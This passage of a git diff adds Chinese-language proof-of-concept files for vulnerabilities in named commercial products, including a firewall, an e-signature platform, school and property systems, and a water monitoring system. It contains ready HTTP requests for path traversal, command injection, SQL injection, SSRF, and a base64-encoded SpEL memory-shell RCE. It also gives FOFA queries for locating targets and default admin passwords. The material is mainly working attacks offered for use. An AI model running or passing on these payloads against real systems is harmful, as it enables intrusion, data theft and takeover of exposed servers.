41637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;"}}
+```
+
+![image-20240621190043394](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211900442.png)
\ No newline at end of file
diff --git a/佑友防火墙后台接口download存在任意文件读取漏洞.md b/佑友防火墙后台接口download存在任意文件读取漏洞.md
new file mode 100644
index 0000000..bb9b409
--- /dev/null
+++ b/佑友防火墙后台接口download存在任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+## 佑友防火墙后台接口download存在任意文件读取漏洞
+
+佑友防火墙网关管理系统download存在任意文件读取漏洞，攻击者可利用该漏洞读取系统的文件。
+
+## fofa
+
+```
+title=”佑友防火墙”
+```
+
+## poc
+
+```
+GET /index.php?c=backup&a=download&file=../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: your-cookie
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: frame
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=4
+```
+
+使用密码登录` admin/hicomadmin`
\ No newline at end of file
diff --git a/佑友防火墙后台接口maintain存在命令执行漏洞.md b/佑友防火墙后台接口maintain存在命令执行漏洞.md
new file mode 100644
index 0000000..219dec4
--- /dev/null
+++ b/佑友防火墙后台接口maintain存在命令执行漏洞.md
@@ -0,0 +1,33 @@
+## 佑友防火墙后台接口maintain存在命令执行漏洞
+
+佑友防火墙网关管理系统maintain存在命令执行漏洞，攻击者可利用该漏洞将恶意的系统命令拼接到正常命令中，从而造成命令执行攻击。
+
+## fofa
+
+```
+app="佑友-佑友防火墙"
+```
+
+## poc
+
+```
+POST /index.php?c=maintain&a=ping HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: your-cookie
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: frame
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+interface=&destip=127.0.0.1;whoami
+```
+
+使用密码登录` admin/hicomadmin`
+
+![image-20240621193046736](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211930785.png)
\ No newline at end of file
diff --git a/华测监测预警系统接口UserEdit.aspx存在SQL注入.md b/华测监测预警系统接口UserEdit.aspx存在SQL注入.md
new file mode 100644
index 0000000..24f5775
--- /dev/null
+++ b/华测监测预警系统接口UserEdit.aspx存在SQL注入.md
@@ -0,0 +1,24 @@
+## 华测监测预警系统接口UserEdit.aspx存在SQL注入
+
+华测监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞，未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
+
+## fofa
+
+```
+icon_hash="-628229493"
+```
+
+## poc
+
+```
+POST /Web/SysManage/UserEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+
+```
+
+![image-20240621183452726](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211834786.png)
\ No newline at end of file
diff --git a/多客圈子论坛前台SSRF漏洞.md b/多客圈子论坛前台SSRF漏洞.md
new file mode 100644
index 0000000..9c8f48d
--- /dev/null
+++ b/多客圈子论坛前台SSRF漏洞.md
@@ -0,0 +1,21 @@
+## 多客圈子论坛前台SSRF漏洞
+
+/app/api/controller/Login.php 控制器中，httpGet方法存在curl_exec函数，且传参可控，导致任意文件读取+SSRF漏洞
+
+## fofa
+
+```
+"/static/index/js/jweixin-1.2.0.js"
+```
+
+## poc
+
+```
+/index.php/api/login/httpGet?url=file:///etc/passwd
+```
+
+![image-20240621195011935](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211950983.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/S12FdNBxJXyS8QXrEHOTfg
\ No newline at end of file
diff --git a/契约锁电子签章平台add远程命令执行漏洞.md b/契约锁电子签章平台add远程命令执行漏洞.md
new file mode 100644
index 0000000..5f95470
--- /dev/null
+++ b/契约锁电子签章平台add远程命令执行漏洞.md
@@ -0,0 +1,23 @@
+## 契约锁电子签章平台add远程命令执行漏洞
+
+契约锁电子签章平台 /captcha/%2e%2e/template/html/add 接口处存在远程代码执行漏洞，未经身份验证的攻击者可通过tomcat对路径参数解析不正当的特性绕过权限认证在目标执行恶意代码，获取服务器权限。经过分析和研判，该漏洞利用难度低，可导致远程代码执行，建议尽快修复。
+
+## fofa
+
+```
+app="契约锁-电子签署平台"
+```
+
+## poc
+
+```
+POST /captcha/%2e%2e/template/html/add HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.155.44 Safari/537.36
+Content-Type: application/json
+X-State: whoami
+ 
+{"file":"1","title":"2","params":[{"extensionParam":"{\"expression\":\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='VCAob3JnLnNwcmluZ2ZyYW1ld29yay5jZ2xpYi5jb3JlLlJlZmxlY3RVdGlscykuZGVmaW5lQ2xhc3MoIlF5c1Rlc3QiLFQgKG9yZy5zcHJpbmdmcmFtZXdvcmsudXRpbC5CYXNlNjRVdGlscykuIGRlY29kZUZyb21TdHJpbmcoInl2NjZ2Z0FBQURJQktBb0FJUUNXQ0FDWENnQ1lBSmtLQUpnQW1nb0Ftd0NjQ0FDZENnQ2JBSjRIQUo4SUFLQUlBS0VJQUtJSUFLTUtBQjhBcEFvQXBRQ21DQUNuQ2dDWUFLZ0tBS1VBcVFjQWd3b0FtQUNxQ0FDckNnQXNBS3dLQUNFQXJRb0FId0NxQ0FDdUNnQWZBSzhLQUxBQXFnZ0FzUW9BTEFDeUNBQ3pDQUMwQndDMUNnQWZBTFlIQUxjS0FMZ0F1UWdBdWdjQXV3Z0F2QWdBdlFjQXZnb0FKd0MvQ2dBbkFNQUtBQ2NBd1FnQXdnY0F3d2dBeEFnQXhRa0F4Z0RIQ2dER0FNZ0lBTWtIQU1vSUFNc0lBTXdJQU0wS0FNNEF6d29BTEFEUUNBRFJDQURTQ0FEVENBRFVDQURWQndEV0NnRFhBTmdLQU5jQTJRb0EyZ0RiQ2dBOUFOd0lBTjBLQUQwQTNnb0FQUURmQndEZ0NnQkZBSllJQU9FS0FDd0E0Z29BUlFEakNBRGtDQURsQndEbUNnQk1BT2NJQU9nSEFPa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUNVeFJlWE5VWlhOME93RUFDR1J2U1c1cVpXTjBBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl5T0FFQUlreHFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmpzQkFBVjJZWEl5TmdFQUdVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzQkFBVjJZWEl5TndFQUlVeHFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1RXVjBhRzlrUlhoalpYQjBhVzl1T3dFQUJYWmhjak14QVFBRmRtRnlNeklCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBVjJZWEl6TXdFQUJYSmxjRzl1QVFBRGMzUnlBUUFTVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBRVkyMWtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBbHlaWE4xYkhSVGRISUJBQVpsYm1OdlpHVUJBQVYyWVhJek1BRUFCWFpoY2pJNUFRQUJTUUVBQlhaaGNqSXhBUUFGZG1GeU1qSUJBQVYyWVhJeU13RUFCWFpoY2pJMEFRQUZkbUZ5TWpVQkFBVjJZWEkzT0FFQUZVeHFZWFpoTDNWMGFXd3ZRWEp5WVhsTWFYTjBPd0VBQlhaaGNqSXdBUUFGZG1GeU1Ua0JBQkpNYW1GMllTOXNZVzVuTDFSb2NtVmhaRHNCQUFWMllYSXhPQUVBQkhaaGNqZ0JBQVIyWVhJNUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzQkFBVjJZWEl4TUFFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZkbUZ5TVRFQkFBVjJZWEl4TWdFQUJYWmhjakV6QVFBRmRtRnlNVFFCQUFWMllYSXhOUUVBQlhaaGNqRTJBUUFUVzB4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrT3dFQUJYWmhjakUzQVFBQldnRUFGVXhxWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1T3dFQUEyMXpad0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUhBTU1IQU9vSEFPc0hBSjhIQUxVSEFPd0hBTGNIQUxzSEFMNEhBR2NIQU9ZQkFBcFRiM1Z5WTJWR2FXeGxBUUFNVVhselZHVnpkQzVxWVhaaERBQlFBRkVCQUFWemRHRnlkQWNBNmd3QTdRRHVEQUR2QVBBSEFPc01BUEVBOEFFQUhXOXlaeTVoY0dGamFHVXVZMjk1YjNSbExsSmxjWFZsYzNSSmJtWnZEQUR5QVBNQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdFQUVHcGhkbUV1YkdGdVp5NVVhSEpsWVdRQkFCVnFZWFpoTG14aGJtY3VWR2h5WldGa1IzSnZkWEFCQUNKdmNtY3VZWEJoWTJobExtTnZlVzkwWlM1U1pYRjFaWE4wUjNKdmRYQkpibVp2QVFBSGRHaHlaV0ZrY3d3QTlBRDFCd0RzREFEMkFQY0JBQVowWVhKblpYUU1BUGdBK1F3QStnRDdEQUQ4QUZnQkFBUm9kSFJ3REFEOUFQNE1BUDhCQUFFQUNVVnVaSEJ2YVc1MEpBd0JBUUVDQndFREFRQWFiM0puTG1Gd1lXTm9aUzUwYjIxallYUXVkWFJwYkM1dVpYUU1BUVFCQlFFQUJuUm9hWE1rTUFFQUNtZGxkRWhoYm1Sc1pYSUJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BUVlCQndFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFRZ01BUWtCQ2dFQUNXZGxkRWRzYjJKaGJBRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0QkFBWm5iRzlpWVd3QkFBcHdjbTlqWlhOemIzSnpBUUFUYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZEF3QkN3RU1EQUVOQVE0TUFQb0JEd0VBRTJkbGRGZHZjbXRsY2xSb2NtVmhaRTVoYldVQkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQURjbVZ4QVFBSFoyVjBUbTkwWlFjQkVBd0JFUUI4REFFU0FSTUJBQXRuWlhSU1pYTndiMjV6WlFFQUVsdE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEVobFlXUmxjZ0VBQjFndFUzUmhkR1VCQUFkdmN5NXVZVzFsQndFVURBRVZBUllNQVJjQVdBRUFCbmRwYm1SdmR3RUFCMk50WkM1bGVHVUJBQUl2WXdFQUJ5OWlhVzR2YzJnQkFBSXRZd0VBRVdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5QndFWURBRVpBUm9NQVJzQkhBY0JIUXdCSGdFZkRBQlFBU0FCQUFKY1FRd0JJUUVpREFFakFGZ0JBQlp6ZFc0dmJXbHpZeTlDUVZORk5qUkZibU52WkdWeUFRQUZWVlJHTFRnTUFTUUJKUXdBYVFFbUFRQUpZV1JrU0dWaFpHVnlBUUFIYzNWalkyVnpjd0VBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFTY0FVUUVBQldWeWNtOXlBUUFIVVhselZHVnpkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUJBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRldkbGRFTnZiblJsZUhSRGJHRnpjMHh2WVdSbGNnRUFHU2dwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQWxuWlhSUVlYSmxiblFCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQURYTmxkRUZqWTJWemMybGliR1VCQUFRb1dpbFdBUUFPWjJWMFZHaHlaV0ZrUjNKdmRYQUJBQmtvS1V4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrUjNKdmRYQTdBUUFEWjJWMEFRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUk9ZVzFsQVFBSVkyOXVkR0ZwYm5NQkFCc29UR3BoZG1FdmJHRnVaeTlEYUdGeVUyVnhkV1Z1WTJVN0tWb0JBQWhuWlhSRGJHRnpjd0VBRXlncFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBcG5aWFJRWVdOcllXZGxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQmhZMnRoWjJVN0FRQVJhbUYyWVM5c1lXNW5MMUJoWTJ0aFoyVUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFBbG5aWFJOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFGWTJ4dmJtVUJBQlFvS1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJITnBlbVVCQUFNb0tVa0JBQlVvU1NsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnRUFCRlJaVUVVQkFBZDJZV3gxWlU5bUFRQVdLRWtwVEdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5T3dFQUVHcGhkbUV2YkdGdVp5OVRlWE4wWlcwQkFBdG5aWFJRY205d1pYSjBlUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUxkRzlNYjNkbGNrTmhjMlVCQUJGcVlYWmhMMnhoYm1jdlVuVnVkR2x0WlFFQUNtZGxkRkoxYm5ScGJXVUJBQlVvS1V4cVlYWmhMMnhoYm1jdlVuVnVkR2x0WlRzQkFBUmxlR1ZqQVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUFoblpYUkNlWFJsY3dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUJZb1cwSXBUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBQ0VBVHdBaEFBQUFBQUFDQUFFQVVBQlJBQUVBVWdBQUFDOEFBUUFCQUFBQUJTcTNBQUd4QUFBQUFnQlRBQUFBQmdBQkFBQUFDUUJVQUFBQURBQUJBQUFBQlFCVkFGWUFBQUFKQUZjQVdBQUJBRklBQUFjaUFBWUFJQUFBQXVrU0FrdTRBQU5NSzdZQUJMWUFCVTBzRWdhMkFBZFhwd0FKVGl1MkFBUk5MQklKdGdBSFRpd1NDcllBQnpvRUxCSUd0Z0FIT2dVc0VndTJBQWM2QmhrRUVneTJBQTA2QnhrSEJMWUFEaTBTRDdZQURUb0lHUWdFdGdBT0dRY3J0Z0FRdGdBUndBQVN3QUFTd0FBU3dBQVNPZ2tETmdvRE5nc1ZDeGtKdnFJQ1hCa0pGUXN5T2d3WkRNWUNTaGtNdGdBVEVoUzJBQldaQWowWkNCa010Z0FST2cwWkRjWUNMeGtOdGdBV3RnQVhFaGkyQUJXWkFoOFpEYllBRnJZQUdiWUFHaElidGdBY21RSU1HUTIyQUJZU0hiWUFEVG9PR1E0RXRnQU9HUTRaRGJZQUVUb1BHUSsyQUJZU0hnTzlBQisyQUNBWkR3TzlBQ0cyQUNJNkVBRTZFUmtRdGdBV0VpTUR2UUFmdGdBZ0dSQUR2UUFodGdBaU9oR25BQ0E2RWhrUXRnQVdFaVcyQUEwNkV4a1RCTFlBRGhrVEdSQzJBQkU2RVJrR0VpYTJBQTA2RWhrU0JMWUFEaGtTR1JHMkFCSEFBQ2M2RXhrVHRnQW93QUFuT2hRRE5oVVZGUmtVdGdBcG9nRmlHUlFWRmJZQUtqb1dHUmJHQVU0WkJSSXJBNzBBSDdZQUlCa1dBNzBBSWJZQUlzQUFMRG9YR1JmR0FUQVpGN2dBQTdZQUU3WUFISmtCSWhrRkVpMjJBQTA2R0JrWUJMWUFEaGtZR1JhMkFCRTZHUmtadGdBV0VpNEV2UUFmV1FPeUFDOVR0Z0FnR1JrRXZRQWhXUU1FdUFBd1U3WUFJam9hR1JxMkFCWVNNUU85QUIvQUFESzJBQ0FaR2dPOUFDRzJBQ0k2R3hrWnRnQVdFak1FdlFBZldRTVRBQ3hUdGdBZ0dSa0V2UUFoV1FNU05GTzJBQ0xBQUN3NkhCSTF1QUEydGdBM0VqaTJBQldaQUJrR3ZRQXNXUU1TT1ZOWkJCSTZVMWtGR1J4VHB3QVdCcjBBTEZrREVqdFRXUVFTUEZOWkJSa2NVem9kdXdBOVdiZ0FQaGtkdGdBL3RnQkF0d0JCRWtLMkFFTzJBRVE2SHJzQVJWbTNBRVlaSGhKSHRnQkl0Z0JKT2g4Wkc3WUFGaEpLQmIwQUgxa0RFd0FzVTFrRUV3QXNVN1lBSUJrYkJiMEFJVmtERWpSVFdRUVpIbE8yQUNKWEJEWUtwd0FKaEJVQnAvNmFGUXFaQUFhbkFBbUVDd0duL2FJU1MwdW5BQXRNSzdZQVRSSk9TeXF3QUFNQUR3QVdBQmtBQ0FFQkFSb0JIUUFrQUFNQzNBTGZBRXdBQXdCVEFBQUJBZ0JBQUFBQUN3QURBQTRBQndBUEFBOEFFZ0FXQUJVQUdRQVRBQm9BRkFBZkFCY0FKZ0FZQUM0QUdRQTJBQm9BUGdBYkFFY0FIQUJOQUIwQVZRQWVBRnNBSHdCeUFDQUFkUUFpQUlBQUl3Q0hBQ1FBbVFBbEFLSUFKZ0RLQUNjQTFnQW9BTndBS1FEbEFDb0EvZ0FyQVFFQUxnRWFBRE1CSFFBdkFSOEFNQUVyQURFQk1RQXlBVG9BTlFGREFEWUJTUUEzQVZVQU9BRmZBRG9CYkFBN0FYVUFQQUY2QUQwQmt3QStBYVlBUHdHdkFFQUJ0UUJCQWI0QVFnSGtBRU1DQUFCRkFpY0FTQUppQUVrQ2ZnQktBcEVBU3dLL0FFd0N3Z0JOQXNVQU9nTExBRklDMEFCVEF0TUFJZ0xaQUcwQzNBQnhBdDhBYmdMZ0FHOEM1QUJ3QXVjQWN3QlVBQUFCYWdBa0FCb0FCUUJaQUZvQUF3RXJBQThBV3dCY0FCTUJId0FiQUYwQVhnQVNBYThCRmdCZkFGd0FHQUcrQVFjQVlBQmhBQmtCNUFEaEFHSUFZUUFhQWdBQXhRQmpBR0VBR3dJbkFKNEFaQUJsQUJ3Q1lnQmpBR1lBWndBZEFuNEFSd0JvQUdVQUhnS1JBRFFBYVFCbEFCOEJrd0V5QUdvQVpRQVhBWFVCVUFCckFHRUFGZ0ZpQVdrQVdRQnNBQlVBMWdIOUFHMEFYQUFPQU9VQjdnQnVBR0VBRHdEK0FkVUFid0JoQUJBQkFRSFNBSEFBWVFBUkFVTUJrQUJ4QUZ3QUVnRlZBWDRBY2dCekFCTUJYd0YwQUYwQWN3QVVBS0lDTVFCMEFHRUFEUUNIQWt3QWRRQjJBQXdBZUFKaEFIY0FiQUFMQUFjQzFRQjRBSFlBQVFBUEFzMEFlUUI2QUFJQUpnSzJBSHNBZkFBREFDNENyZ0I5QUh3QUJBQTJBcVlBZmdCOEFBVUFQZ0tlQUg4QWZBQUdBRWNDbFFDQUFGd0FCd0JWQW9jQWdRQmNBQWdBY2dKcUFJSUFnd0FKQUhVQ1p3Q0VBSVVBQ2dMZ0FBY0Fld0NHQUFFQUF3TG1BSWNBWlFBQUFJZ0FBQUdYQUE3L0FCa0FBd2NBaVFjQWlnY0Fpd0FCQndDTUJmOEFXQUFNQndDSkJ3Q0tCd0NMQndDTkJ3Q05Cd0NOQndDTkJ3Q09Cd0NPQndBU0FRRUFBUDhBcEFBU0J3Q0pCd0NLQndDTEJ3Q05Cd0NOQndDTkJ3Q05Cd0NPQndDT0J3QVNBUUVIQUlvSEFJOEhBSTRIQUk4SEFJOEhBSThBQVFjQWtCei9BQ2NBRmdjQWlRY0FpZ2NBaXdjQWpRY0FqUWNBalFjQWpRY0FqZ2NBamdjQUVnRUJCd0NLQndDUEJ3Q09Cd0NQQndDUEJ3Q1BCd0NPQndDUkJ3Q1JBUUFBL3dEcUFCMEhBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFjQWlnY0Fqd2NBamdjQWp3Y0Fqd2NBandjQWpnY0FrUWNBa1FFSEFJOEhBSWtIQUk0SEFJOEhBSThIQUk4SEFJa0FBRklIQUpML0FHUUFGZ2NBaVFjQWlnY0Fpd2NBalFjQWpRY0FqUWNBalFjQWpnY0FqZ2NBRWdFQkJ3Q0tCd0NQQndDT0J3Q1BCd0NQQndDUEJ3Q09Cd0NSQndDUkFRQUErZ0FGL3dBSEFBd0hBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFBQStnQUYvd0FGQUFFSEFJa0FBUWNBa3djQUFRQ1VBQUFBQWdDViIpLG5ldyBqYXZheC5tYW5hZ2VtZW50LmxvYWRpbmcuTUxldChuZXcgamF2YS5uZXQuVVJMWzBdLFQgKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCk=';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'](deStr);c.getValue();\"}","name":"test"}]}
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211837539.png)
\ No newline at end of file
diff --git a/学分制系统GetCalendarContentById存在SQL注入漏洞.md b/学分制系统GetCalendarContentById存在SQL注入漏洞.md
new file mode 100644
index 0000000..73373be
--- /dev/null
+++ b/学分制系统GetCalendarContentById存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+## 学分制系统GetCalendarContentById存在SQL注入漏洞
+
+上海鹏达计算机系统开发有限公司，成立于1996年，上海睿泰企业管理集团成员，位于上海市，是一家以从事软件和信息技术服务业为主的企业。上海鹏达计算机系统开发有限公司学分制系统GetCalendarContentById存在SQL注入漏洞，未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。
+
+## fofa
+
+```
+body="www.pantosoft.com" && body="Pantosoft Corporation" || icon_hash="-1632820573"
+```
+
+## poc
+
+```JAVA
+POST /WebService_PantoSchool.asmx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: ASP.NET_SessionId=e5l5acb3exqi5bmtezazrjsg
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+SOAPAction: http://tempuri.org/GetCalendarContentById
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 314
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <tem:GetCalendarContentById>
+         <!--type: string-->
+         <tem:ID>-7793' OR 7994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7994=7994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113))) AND 'qciT'='qciT</tem:ID>
+      </tem:GetCalendarContentById>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![image-20240621185739651](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211857723.png)
\ No newline at end of file
diff --git a/平升水库水文监测系统默认密码.md b/平升水库水文监测系统默认密码.md
new file mode 100644
index 0000000..35966c2
--- /dev/null
+++ b/平升水库水文监测系统默认密码.md
@@ -0,0 +1,16 @@
+## 平升水库水文监测系统默认密码
+
+## fofa
+
+```
+body="js/PSExtend.js"
+```
+
+## poc
+
+```
+Data86/Data86
+admin/123
+```
+
+![image-20240619111253661](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406191112776.png)
\ No newline at end of file
diff --git a/新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md b/新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md
new file mode 100644
index 0000000..3ed3661
--- /dev/null
+++ b/新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+## 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞
+
